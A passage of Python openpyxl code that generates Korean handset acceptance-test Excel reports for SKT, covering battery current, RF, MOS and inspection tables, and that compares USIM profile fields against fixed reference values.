sheet_in['G11'].value\n\n # sheet row 6 handle\n sheet_out['A6'] = 'SKT 기준'\n sheet_out['B6'] = sheet_in['F6'].value\n sheet_out['C6'] = sheet_in['H6'].value\n sheet_out['D6'] = sheet_in['J6'].value\n sheet_out['E6'] = sheet_in['L6'].value\n sheet_out['F6'] = sheet_in['N6'].value\n sheet_out['G6'] = sheet_in['P6'].value\n sheet_out['H6'] = sheet_in['H12'].value\n\n # sheet row 7~8\n sheet_out['A7'] = target\n sheet_out['B7'] = sheet_in['F8'].value\n sheet_out['C7'] = sheet_in['H8'].value\n sheet_out['D7'] = sheet_in['J8'].value\n sheet_out['E7'] = sheet_in['L8'].value\n sheet_out['F7'] = sheet_in['N8'].value\n sheet_out['G7'] = sheet_in['P8'].value\n sheet_out['H7'] = sheet_in['H14'].value\n sheet_out['A8'] = ref\n sheet_out['B8'] = sheet_in['F9'].value\n sheet_out['C8'] = sheet_in['H9'].value\n sheet_out['D8'] = sheet_in['J9'].value\n sheet_out['E8'] = sheet_in['L9'].value\n sheet_out['F8'] = sheet_in['N9'].value\n sheet_out['G8'] = sheet_in['P9'].value\n sheet_out['H8'] = sheet_in['H15'].value\n\n # sheet row 9~10\n sheet_out.merge_cells('A9:A10')\n sheet_out['A9'] = '구분'\n sheet_out['B9'] = sheet_in['I10'].value\n sheet_out['C9'] = sheet_in['K10'].value\n sheet_out['D9'] = sheet_in['M10'].value\n sheet_out['E9'] = '동영상'\n sheet_out['F9'] = sheet_in['E10'].value\n\n sheet_out['B10'] = sheet_in['I11'].value\n sheet_out['C10'] = sheet_in['K11'].value\n sheet_out['D10'] = sheet_in['M11'].value\n sheet_out['E10'] = '녹화'\n sheet_out['F10'] = sheet_in['E11'].value\n\n # sheet row 11 handle\n sheet_out['A11'] = 'SKT 기준'\n sheet_out['B11'] = sheet_in['J12'].value\n sheet_out['C11'] = sheet_in['L12'].value\n sheet_out['D11'] = sheet_in['N12'].value\n sheet_out['E11'] = sheet_in['P12'].value\n sheet_out['F11'] = sheet_in['F12'].value\n\n # sheet row 12~13\n sheet_out['A12'] = target\n sheet_out['B12'] = sheet_in['J14'].value\n sheet_out['C12'] = sheet_in['L14'].value\n sheet_out['D12'] = sheet_in['N14'].value\n sheet_out['E12'] = sheet_in['P14'].value\n sheet_out['F12'] = sheet_in['F14'].value\n sheet_out['A13'] = ref\n sheet_out['B13'] = sheet_in['F15'].value\n sheet_out['C13'] = sheet_in['H15'].value\n sheet_out['D13'] = sheet_in['J15'].value\n sheet_out['E13'] = sheet_in['L15'].value\n sheet_out['F13'] = sheet_in['N15'].value\n\n # sheet row 15~17 handle\n sheet_out['A15'] = '▣ LTE'\n sheet_out.merge_cells('A16:A17')\n sheet_out['A16'] = '구분'\n sheet_out.merge_cells('B16:C16')\n sheet_out['B16'] = sheet_in['E18'].value\n sheet_out.merge_cells('D16:E16')\n sheet_out['D16'] = sheet_in['I18'].value\n sheet_out.merge_cells('F16:H16')\n sheet_out['F16'] = sheet_in['M18'].value\n\n sheet_out['B17'] = sheet_in['E19'].value\n sheet_out['C17'] = sheet_in['G19'].value\n sheet_out['D17'] = sheet_in['I19'].value\n sheet_out['E17'] = sheet_in['K19'].value\n sheet_out['F17'] = sheet_in['M19'].value\n sheet_out['G17'] = sheet_in['O19'].value\n sheet_out['H17'] = sheet_in['E25'].value\n\n # sheet row 18 handle\n sheet_out['A18'] = 'SKT 기준'\n sheet_out['B18'] = sheet_in['F20'].value\n sheet_out['C18'] = sheet_in['H20'].value\n sheet_out['D18'] = sheet_in['J20'].value\n sheet_out['E18'] = sheet_in['L20'].value\n sheet_out['F18'] = sheet_in['N20'].value\n sheet_out['G18'] = sheet_in['P20'].value\n sheet_out['H18'] = sheet_in['F26'].value\n\n # sheet row 19~20\n sheet_out['A19'] = target\n sheet_out['B19'] = sheet_in['F22'].value\n sheet_out['C19'] = sheet_in['H22'].value\n sheet_out['D19'] = sheet_in['J22'].value\n sheet_out['E19'] = sheet_in['L22'].value\n sheet_out['F19'] = sheet_in['N22'].value\n sheet_out['G19'] = sheet_in['P22'].value\n sheet_out['H19'] = sheet_in['F28'].value\n sheet_out['A20'] = ref\n sheet_out['B20'] = sheet_in['F23'].value\n sheet_out['C20'] = sheet_in['H23'].value\n sheet_out['D20'] = sheet_in['J23'].value\n sheet_out['E20'] = sheet_in['L23'].value\n sheet_out['F20'] = sheet_in['N23'].value\n sheet_out['G20'] = sheet_in['P23'].value\n sheet_out['H20'] = sheet_in['F29'].value\n\n # sheet row 21~22\n sheet_out.merge_cells('A21:A22')\n sheet_out['A21'] = '구분'\n sheet_out['B21'] = sheet_in['G24'].value\n sheet_out['C21'] = sheet_in['I24'].value\n sheet_out['D21'] = sheet_in['K24'].value\n\n sheet_out['B22'] = sheet_in['G25'].value\n sheet_out['C22'] = sheet_in['I25'].value\n sheet_out['D22'] = sheet_in['K25'].value\n\n # sheet row 23 handle\n sheet_out['A23'] = 'SKT 기준'\n sheet_out['B23'] = sheet_in['H26'].value\n sheet_out['C23'] = sheet_in['J26'].value\n sheet_out['D23'] = sheet_in['L26'].value\n\n # sheet row 24~25\n sheet_out['A24'] = target\n sheet_out['B24'] = sheet_in['H28'].value\n sheet_out['C24'] = sheet_in['J28'].value\n sheet_out['D24'] = sheet_in['L28'].value\n sheet_out['A25'] = ref\n sheet_out['B25'] = sheet_in['H29'].value\n sheet_out['C25'] = sheet_in['J29'].value\n sheet_out['D25'] = sheet_in['L29'].value\n\n # sheet row 27~29 handle\n sheet_out['A27'] = '▣ WCDMA'\n sheet_out.merge_cells('A28:A29')\n sheet_out['A28'] = '구분'\n sheet_out['B28'] = sheet_in['E32'].value\n sheet_out.merge_cells('C28:D28')\n sheet_out['C28'] = sheet_in['G32'].value\n sheet_out['E28'] = sheet_in['K32'].value\n\n sheet_out['B29'] = sheet_in['E33'].value\n sheet_out['C29'] = sheet_in['G33'].value\n sheet_out['D29'] = sheet_in['I33'].value\n sheet_out['E29'] = sheet_in['K33'].value\n\n # sheet row 30 handle\n sheet_out['A30'] = 'SKT 기준'\n sheet_out['B30'] = sheet_in['F34'].value\n sheet_out['C30'] = sheet_in['H34'].value\n sheet_out['D30'] = sheet_in['J34'].value\n sheet_out['E30'] = sheet_in['L34'].value\n\n # sheet row 31~32\n sheet_out['A31'] = target\n sheet_out['B31'] = sheet_in['F36'].value\n sheet_out['C31'] = sheet_in['H36'].value\n sheet_out['D31'] = sheet_in['J36'].value\n sheet_out['E31'] = sheet_in['L36'].value\n sheet_out['A32'] = ref\n sheet_out['B32'] = sheet_in['F37'].value\n sheet_out['C32'] = sheet_in['H37'].value\n sheet_out['D32'] = sheet_in['J37'].value\n sheet_out['E32'] = sheet_in['L37'].value\n\n\n # sheet row 34~36 handle\n sheet_out['A34'] = '▣ WiFi'\n sheet_out.merge_cells('A35:A36')\n sheet_out['A35'] = '구분'\n sheet_out.merge_cells('B35:C35')\n sheet_out['B35'] = sheet_in['E40'].value\n sheet_out['D35'] = sheet_in['I40'].value\n sheet_out['E35'] = sheet_in['K40'].value\n sheet_out['F35'] = sheet_in['M40'].value\n\n sheet_out['B36'] = sheet_in['E41'].value\n sheet_out['C36'] = sheet_in['G41'].value\n sheet_out['D36'] = sheet_in['I41'].value\n sheet_out['E36'] = sheet_in['K41'].value\n sheet_out['F36'] = sheet_in['M41'].value\n\n # sheet row 37 handle\n sheet_out['A37'] = 'SKT 기준'\n sheet_out['B37'] = sheet_in['F42'].value\n sheet_out['C37'] = sheet_in['H42'].value\n sheet_out['D37'] = sheet_in['J42'].value\n sheet_out['E37'] = sheet_in['L42'].value\n sheet_out['F37'] = sheet_in['N42'].value\n\n # sheet row 38~39\n sheet_out['A38'] = target\n sheet_out['B38'] = sheet_in['F44'].value\n sheet_out['C38'] = sheet_in['H44'].value\n sheet_out['D38'] = sheet_in['J44'].value\n sheet_out['E38'] = sheet_in['L44'].value\n sheet_out['F38'] = sheet_in['N44'].value\n sheet_out['A39'] = ref\n sheet_out['B39'] = sheet_in['F45'].value\n sheet_out['C39'] = sheet_in['H45'].value\n sheet_out['D39'] = sheet_in['J45'].value\n sheet_out['E39'] = sheet_in['L45'].value\n sheet_out['F39'] = sheet_in['N45'].value\n\n # sheet row 41~43 handle\n sheet_out['A41'] = '▣ Bluetooth'\n sheet_out.merge_cells('A42:A43')\n sheet_out['A42'] = '구분'\n sheet_out.merge_cells('B42:F42')\n sheet_out['B42'] = sheet_in['E48'].value\n\n sheet_out['B43'] = sheet_in['E49'].value\n sheet_out['C43'] = sheet_in['G49'].value\n sheet_out['D43'] = sheet_in['I49'].value\n sheet_out['E43'] = sheet_in['K49'].value\n sheet_out['F43'] = sheet_in['M49'].value\n\n # sheet row 44 handle\n sheet_out['A44'] = 'SKT 기준'\n sheet_out['B44'] = sheet_in['F50'].value\n sheet_out['C44'] = sheet_in['H50'].value\n sheet_out['D44'] = sheet_in['J50'].value\n sheet_out['E44'] = sheet_in['L50'].value\n sheet_out['F44'] = sheet_in['N50'].value\n\n # sheet row 45~46\n sheet_out['A45'] = target\n sheet_out['B45'] = sheet_in['F52'].value\n sheet_out['C45'] = sheet_in['H52'].value\n sheet_out['D45'] = sheet_in['J52'].value\n sheet_out['E45'] = sheet_in['L52'].value\n sheet_out['F45'] = sheet_in['N52'].value\n sheet_out['A46'] = ref\n sheet_out['B46'] = sheet_in['F53'].value\n sheet_out['C46'] = sheet_in['H53'].value\n sheet_out['D46'] = sheet_in['J53'].value\n sheet_out['E46'] = sheet_in['L53'].value\n sheet_out['F46'] = sheet_in['N53'].value\n\n self.setPrintText('/s {}번 파일 \"배터리소모전류 결과 (시간)\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:H46\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A15'].alignment = self.top_alignment\n sheet_out['A27'].alignment = self.top_alignment\n sheet_out['A34'].alignment = self.top_alignment\n sheet_out['A41'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A4:H8\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A9:F13\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A16:H20\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A21:D25\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A28:E32\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A35:F39\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A42:F46\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A3:H46\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']\n sheet_width_list = [29.88, 13.38, 13.38, 13.38, 13.38, 13.38, 13.38, 13.38]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']:\n\n sheet_out[col + '4'].fill = self.brown_fill\n sheet_out[col + '5'].fill = self.brown_fill\n sheet_out[col + '6'].fill = self.apricot_fill\n sheet_out[col + '16'].fill = self.brown_fill\n sheet_out[col + '17'].fill = self.brown_fill\n sheet_out[col + '18'].fill = self.apricot_fill\n\n for col in ['A', 'B', 'C', 'D', 'E', 'F']:\n\n sheet_out[col + '9'].fill = self.brown_fill\n sheet_out[col + '10'].fill = self.brown_fill\n sheet_out[col + '11'].fill = self.apricot_fill\n sheet_out[col + '35'].fill = self.brown_fill\n sheet_out[col + '36'].fill = self.brown_fill\n sheet_out[col + '37'].fill = self.apricot_fill\n sheet_out[col + '42'].fill = self.brown_fill\n sheet_out[col + '43'].fill = self.brown_fill\n sheet_out[col + '44'].fill = self.apricot_fill\n\n for col in ['A', 'B', 'C', 'D', 'E']:\n\n sheet_out[col + '28'].fill = self.brown_fill\n sheet_out[col + '29'].fill = self.brown_fill\n sheet_out[col + '30'].fill = self.apricot_fill\n\n\n for col in ['A', 'B', 'C', 'D']:\n\n sheet_out[col + '21'].fill = self.brown_fill\n sheet_out[col + '22'].fill = self.brown_fill\n sheet_out[col + '23'].fill = self.apricot_fill\n\n for i in [7, 8, 12, 13, 19, 20, 24, 25, 31, 32, 38, 39, 45, 46]:\n\n sheet_out['A' + str(i)].fill = self.gray_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"배터리소모전류 결과 (시간)\" 시트 스타일 적용 완료 /e'.format(idx+1))\n\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 첨부 1 측정기준 Tab\n def attach_generate_data_1(self):\n\n try:\n for idx, item in enumerate(self.list_out_files):\n\n wb_output = openpyxl.load_workbook(item)\n # option setting wb.output\n sheet_out = wb_output['첨부1. 측정기준 및 가점']\n list_band = ['Band 1 15M', 'Band 3 20M', 'Band 5 10M',\n 'Band 7 20M', 'Band 7 10M']\n list_trp_base = ['14.00dBm', '15.00dBm', '13.50dBm',\n '13.00dBm', '13.00dBm']\n list_tis_base = ['-92.00dBm', '-91.00dBm', '-87.00dBm',\n '-90.00dBm', '-93.00dBm']\n\n # sheet row 1 handle\n sheet_out.merge_cells('A1:D1')\n sheet_out['A1'] = '첨부1. 측정기준 및 가점'\n\n # sheet row 3 handle\n sheet_out['A3'] = '▣ RF 성능 : 기 출시 단말 측정하여 상위 70% 수준으로 설정'\n sheet_out['A4'] = ' -TRP'\n\n # 5~10 row\n sheet_out['A5'] = 'SISO LTE'\n sheet_out['B5'] = '기준(RHP)'\n sheet_out.merge_cells('C5:D5')\n sheet_out['C5'] = '측정기준 History'\n\n for i in range(6, 11):\n sheet_out['A' + str(i)] = list_band[i - 6]\n sheet_out['B' + str(i)] = list_trp_base[i - 6]\n sheet_out.merge_cells('C6:D10')\n sheet_out['C6'] = '기준대비 1dB 증가후 +1점/1dBm 가점\\n기준대비 1dB 저하후 - 1점/1dBm 감점'\n # 11~17 row\n sheet_out['A11'] = ' -TIS (SISO LTE)'\n\n # 12~17 row\n sheet_out['A12'] = 'SISO LTE'\n sheet_out['B12'] = '기준(RHP)'\n sheet_out.merge_cells('C12:D12')\n sheet_out['C12'] = '측정기준 History'\n\n for i in range(13, 18):\n sheet_out['A' + str(i)] = list_band[i - 13]\n sheet_out['B' + str(i)] = list_trp_base[i - 13]\n sheet_out.merge_cells('C13:D17')\n sheet_out['C13'] = '기준대비 1dB 증가후 +1점/3dBm 가점\\n기준대비 1dB 저하후 - 1점/3dBm 감점'\n\n # 19~25 row\n sheet_out['A19'] = '▣ 배터리 소모전류'\n sheet_out.merge_cells('A20:D20')\n sheet_out['A20'] = \" - '18.1 ~ '19.8 납품검사 삼성/LG 단말 29종으로\\n측정 기준으로 소모전류 (평균+STD), 배터리 용량 (3000mA) 산출\"\n sheet_out.merge_cells('A21:D21')\n sheet_out['A21'] = \" - Ref. 단말 대비 10% 이내 (측정기준부재항목)\"\n\n sheet_out['A23'] = '▣ MOS'\n sheet_out.merge_cells('A24:D24')\n sheet_out['A24'] = \" - ITU-T 권고 P.800 항목에 규정 참고 (LTE : 3.5, WCDMA : 3.0)\"\n sheet_out.merge_cells('A25:D25')\n sheet_out['A25'] = '. MOS 3.5~4 : 자연스러운 통화 수준\\n. MOS 3~3.5 : 대화는 잘 이루어지지만 품질저하 느낄 수 있음'\n\n self.setPrintText('/s {}번 파일 \"첨부1\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:D25\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A4'].alignment = self.top_alignment\n sheet_out['C6'].alignment = self.top_alignment_3\n sheet_out['A11'].alignment = self.top_alignment\n sheet_out['C13'].alignment = self.top_alignment_3\n sheet_out['A19'].alignment = self.top_alignment\n sheet_out['A20'].alignment = self.top_alignment_3\n sheet_out['A21'].alignment = self.top_alignment\n sheet_out['A23'].alignment = self.top_alignment\n sheet_out['A24'].alignment = self.top_alignment\n sheet_out['A25'].alignment = self.top_alignment_3\n\n # all cell border adjust\n for mCell in sheet_out[\"A5:D10\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n for mCell in sheet_out[\"A12:D17\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A2:D25\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [25, 15.88, 17, 17]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n sheet_out.row_dimensions[20].height = 45\n sheet_out.row_dimensions[25].height = 45\n\n # Set Pattern Fill\n for i in [5, 12]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n sheet_out['D' + str(i)].fill = self.brown_fill\n\n for i in [5, 6, 7, 8, 9, 10, 13, 14, 15, 16, 17]:\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.apricot_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"첨부1\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 첨부 2 측정기준 Tab\n def attach_generate_data_2(self):\n\n try:\n for idx, item in enumerate(self.list_out_files):\n\n wb_output = openpyxl.load_workbook(item)\n # option setting wb.output\n sheet_out = wb_output['첨부2. 납품검사']\n list_items = ['고온 고습/저온 Cycling 시험\t', '낙하시험', '방수시험', 'ESD (정전기) 시험',\n '개통 및 사용성 시험', 'RF Auto (50대, 제조사 자체 측정)', 'CATS_Priority1 (제조사 자체 측정)',\n 'GPS (제조사 자체 측정)', '발열 (제조사 자체 측정)', '카메라 전.후면 화질평가 (제조사 자체 측정)',\n 'WiFi 무선성능(제조사 자체 측정)', 'BT 무선성능(제조사 자체 측정)']\n list_items_2 = ['무선기기 형식등록', 'GCF 인증서', 'WiFi 인증서', 'NFC 인증서', 'Bluetooth 인증서']\n\n # sheet row 1 handle\n sheet_out.merge_cells('A1:D1')\n sheet_out['A1'] = '첨부2. 납품검사'\n\n # sheet row 3 handle\n sheet_out['A3'] = '▣ 장소 : (빈곳)'\n\n # 4~16 row\n sheet_out['A4'] = '구분'\n sheet_out.merge_cells('B4:C4')\n sheet_out['B4'] = 'Item'\n sheet_out['D4'] = '결과'\n\n sheet_out.merge_cells('A5:A8')\n sheet_out['A5'] = '신뢰성 시험'\n sheet_out.merge_cells('A9:A16')\n sheet_out['A9'] = 'Performance'\n\n for i in range(5, 17):\n sheet_out.merge_cells('B' + str(i) + ':C' + str(i))\n sheet_out['B' + str(i)] = list_items[i - 5]\n\n # 18~24 row\n sheet_out['A18'] = '▣ 시험 인증서 (PLM 등록)'\n sheet_out['A19'] = '구분'\n sheet_out.merge_cells('B19:C19')\n sheet_out['B19'] = 'Item'\n sheet_out['D19'] = '결과'\n\n sheet_out.merge_cells('A20:A24')\n sheet_out['A20'] = '인증서'\n\n for i in range(20, 25):\n sheet_out.merge_cells('B' + str(i) + ':C' + str(i))\n sheet_out['B' + str(i)] = list_items_2[i - 20]\n\n\n self.setPrintText('/s {}번 파일 \"첨부2\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:D24\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A18'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A4:D16\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n for mCell in sheet_out[\"A19:D24\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A2:D24\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D']\n sheet_width_list = [25, 15.88, 23.75, 17]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for i in [4, 19]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n sheet_out['D' + str(i)].fill = self.brown_fill\n\n for i in range(5,17):\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.gray_fill\n\n for i in range(20,25):\n sheet_out['A' + str(i)].fill = self.gray_fill\n sheet_out['B' + str(i)].fill = self.gray_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"첨부2\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # 첨부 3 측정기준 Tab\n def attach_generate_data_3(self):\n\n try:\n for idx, item in enumerate(self.list_out_files):\n\n wb_output = openpyxl.load_workbook(item)\n # option setting wb.output\n sheet_out = wb_output['첨부3. 단말 상세 SPEC']\n list_items = ['모뎀', 'RFIC', 'Display', '크기', '배터리 용량', 'Flash ROM', 'SRAM', '카메라', '사운드', 'MIC', '방수/방진', '페이', '생체인식',\n '충전', '기타', 'LTE 주파수', 'LTE 로밍 지원 주파수', 'WCDMA 주파수', 'OS(출시버전)', '출시']\n list_items_2 = ['5G NW options', '5G Frequency', 'UE-Category', 'Max Throughput', 'ENDC capability',\n 'LTE capability', 'Modulation', 'MIMO', 'CSI-RS', 'Power', 'Waveform']\n\n # sheet row 1 handle\n sheet_out.merge_cells('A1:C1')\n sheet_out['A1'] = '첨부3. 단말 상세 SPEC'\n\n # sheet row 2 handle\n sheet_out['A2'] = '▣ 기본 정보 '\n\n # 3~23 row\n sheet_out['A3'] = '구분'\n sheet_out['B3'] = '모델1'\n sheet_out['C3'] = 'Ref. 모델'\n\n for i in range(4, 24):\n sheet_out['A' + str(i)] = list_items[i - 4]\n\n # 25~37 row\n sheet_out['A25'] = '▣ N/W Feature 비교'\n sheet_out['A26'] = '구분'\n sheet_out['B26'] = '모델1'\n sheet_out['C26'] = 'Ref. 모델'\n\n for i in range(27, 38):\n sheet_out['A' + str(i)] = list_items_2[i - 27]\n\n self.setPrintText('/s {}번 파일 \"첨부3\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:C37\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A2'].alignment = self.top_alignment\n sheet_out['A25'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A3:C23\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n for mCell in sheet_out[\"A26:C37\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A2:C3\"]:\n for cell in mCell:\n cell.font = self.index_font\n for mCell in sheet_out[\"A4:C23\"]:\n for cell in mCell:\n cell.font = self.value_font\n for mCell in sheet_out[\"A25:C26\"]:\n for cell in mCell:\n cell.font = self.index_font\n for mCell in sheet_out[\"A27:C37\"]:\n for cell in mCell:\n cell.font = self.value_font\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C']\n sheet_width_list = [20.13, 39, 39]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for i in [3, 26]:\n sheet_out['A' + str(i)].fill = self.brown_fill\n sheet_out['B' + str(i)].fill = self.brown_fill\n sheet_out['C' + str(i)].fill = self.brown_fill\n\n for i in range(4, 24):\n sheet_out['A' + str(i)].fill = self.gray_fill\n\n for i in range(27, 38):\n sheet_out['A' + str(i)].fill = self.gray_fill\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"첨부3\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # f2 function\n def f2_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_output = openpyxl.load_workbook(item, data_only=True)\n # option setting wb.output\n sheet_in = wb_output['Profile']\n wb_output.create_sheet('Comparison', 2)\n sheet_out = wb_output['Comparison']\n # 1st list items are fixed usim info, 2nd list items are variable usim info\n list_find = [['ESN', 'HPPLMN', 'HPLMNNWACT', 'FPLMN', 'PWS', 'HPLMNwACT', 'DOMAIN'],\n ['IMEI', 'IMSI', 'KEYS', 'KEYSPS', 'MSISDN', 'SMSP', 'PSLOCI', 'ACC', 'LOCI', 'IMSI_M',\n 'MDN', 'IRM', 'IMPI', 'IMPU', 'P_CSCF']]\n list_fixed_item = []\n list_variable_item = []\n list_reference_item = [\n '0000FFFFFFFFFFFF',\n '01',\n '54F050400054F0508000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000',\n '54F08054F06054F00354F040',\n 'FCFFFFFFFFFFFFFFFFFF',\n '54F050400054F0508000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000FFFFFF0000',\n '800A736B74696D732E6E6574FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF',\n ]\n\n total_row = len(sheet_in['A'])\n\n # sheet row 1 handle\n sheet_out.merge_cells('B1:E1')\n sheet_out['B1'] = 'USIM DATA COMPARISON'\n # sheet row 2 handle\n sheet_out['B2'] = 'EF파일명'\n sheet_out['C2'] = 'DATA값'\n sheet_out['D2'] = '고정기준값'\n sheet_out['E2'] = '비교'\n\n # finding fixed value\n for fixed in list_find[0]:\n for i in range(2, total_row+1):\n if sheet_in['A' + str(i)].value == fixed:\n data = sheet_in['Q' + str(i)].value.strip()\n data = re.sub(r'[\\n,\\s,\\t]', '', data)\n list_fixed_item.append(data)\n break\n\n # finding variable value\n for variable in list_find[1]:\n for i in range(2, total_row+1):\n if sheet_in['A' + str(i)].value == variable:\n data = sheet_in['Q' + str(i)].value.strip()\n data = re.sub(r'[\\n,\\s,\\t]', '', data)\n list_variable_item.append(data)\n break\n\n # red\n # 3~ 24 rows fill data\n # 3~9까지 fixed\n # 10~24까지 variable\n\n # all cell font adjust\n for mCell in sheet_out[\"B2:E24\"]:\n for cell in mCell:\n cell.font = self.f2_value_font\n\n sheet_out['B1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n # 고정값 Set\n for i, f_item in enumerate(list_fixed_item):\n sheet_out['B' + str(i + 3)] = list_find[0][i]\n sheet_out['B' + str(i + 3)].fill = self.yellow_fill\n sheet_out['C' + str(i + 3)] = f_item\n sheet_out['D' + str(i + 3)] = list_reference_item[i]\n sheet_out['D' + str(i + 3)].fill = self.yellow_fill\n\n if list_fixed_item[i] == list_reference_item[i]:\n sheet_out['E' + str(i + 3)] = 'True(일치함)'\n sheet_out['E' + str(i + 3)].font = self.f2_blue_font\n else:\n sheet_out['E' + str(i + 3)] = 'False(불일치)'\n sheet_out['E' + str(i + 3)].font = self.f2_red_font\n\n sheet_out['E' + str(i + 3)].fill = self.yellow_fill\n\n # 가변값 Set\n for i, v_item in enumerate(list_variable_item):\n sheet_out['B' + str(i + 10)] = list_find[1][i]\n sheet_out['B' + str(i + 10)].fill = self.orange_fill\n sheet_out['C' + str(i + 10)] = v_item\n sheet_out['D' + str(i + 10)].fill = self.orange_fill\n sheet_out['E' + str(i + 10)].fill = self.orange_fill\n\n self.setPrintText('/s {}번 파일 \"Comparison\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in 